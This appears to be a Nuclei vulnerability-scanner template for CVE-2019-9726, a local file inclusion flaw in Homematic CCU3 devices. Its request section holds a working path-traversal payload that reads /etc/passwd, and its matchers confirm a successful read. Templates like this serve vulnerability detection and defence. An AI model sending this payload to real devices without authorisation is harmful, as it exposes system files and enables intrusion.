nuclei-templates/http/cves/2019/CVE-2019-9726.yaml

39 lines
1.0 KiB
YAML
Raw Normal View History

2022-02-25 00:08:03 +00:00
id: CVE-2019-9726
2022-02-25 00:08:03 +00:00
info:
name: Homematic CCU3 - Local File Inclusion
2022-02-25 00:08:03 +00:00
author: 0x_Akoko
severity: high
description: eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
2022-02-25 00:08:03 +00:00
reference:
- https://atomic111.github.io/article/homematic-ccu3-fileread
- https://nvd.nist.gov/vuln/detail/CVE-2019-9726
2022-02-25 00:08:03 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-02-25 00:08:03 +00:00
cvss-score: 7.5
cve-id: CVE-2019-9726
cwe-id: CWE-22
tags: cve,cve2019,homematic,lfi
metadata:
max-request: 1
2022-02-25 00:08:03 +00:00
http:
2022-02-25 00:08:03 +00:00
- method: GET
path:
- "{{BaseURL}}/.%00./.%00./etc/passwd"
2022-02-25 00:08:03 +00:00
matchers-condition: and
matchers:
- type: regex
2022-02-25 00:08:03 +00:00
part: body
regex:
- "root:.*:0:0:"
- "bin:.*:0:0:"
condition: or
2022-02-25 00:08:03 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/07/08